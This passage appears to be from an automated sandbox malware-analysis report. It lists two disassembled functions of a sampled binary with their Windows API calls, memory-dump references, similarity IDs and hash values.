                                                      • Opcode Fuzzy Hash: 709fcd496c4412612b4c859c0b0d3f2232a72271dfedcf4d822cb4157626de11
                                                      • Instruction Fuzzy Hash: ECD0C9327813107BE664B7729C0FFC666549B44B14F105926B74AFA1E0C9A5A8068A55
                                                      Function 00EC2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC232C
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EC233F
                                                        • Part of subcall function 00E9E97B: Sleep.KERNEL32 ref: 00E9E9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 72f12f6ab45ce2f8cbc1d392f5a4b98af83d968ddec32a51f019d505631fcbec
                                                      • Instruction ID: b0d07a93cbfe6ed85c1d03697288d4604566c61e875b2e676d991d95f7328646
                                                      • Opcode Fuzzy Hash: 72f12f6ab45ce2f8cbc1d392f5a4b98af83d968ddec32a51f019d505631fcbec
                                                      • Instruction Fuzzy Hash: 14D02232780300BBE664B332DC0FFC67A049B00B00F100926B30AFA1E0C8F1A806CB00
                                                      Function 00E6BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00E6BE93
                                                      • GetLastError.KERNEL32 ref: 00E6BEA1
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00E6BEFC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1717984340-0
                                                      • Opcode ID: 600f7405aaba6f1738afbc70b853f519a92842e6f1312519983840b42efdafd8
                                                      • Instruction ID: f086ba6a0dd3022c74e6e2c1f38aaca398280dd03cfeddb77b90aadf1efb7801
                                                      • Opcode Fuzzy Hash: 600f7405aaba6f1738afbc70b853f519a92842e6f1312519983840b42efdafd8
                                                      • Instruction Fuzzy Hash: EE411635780206AFCF218F65EC44ABA7BA5EF41394F246169F959F71B1DB318C81CB60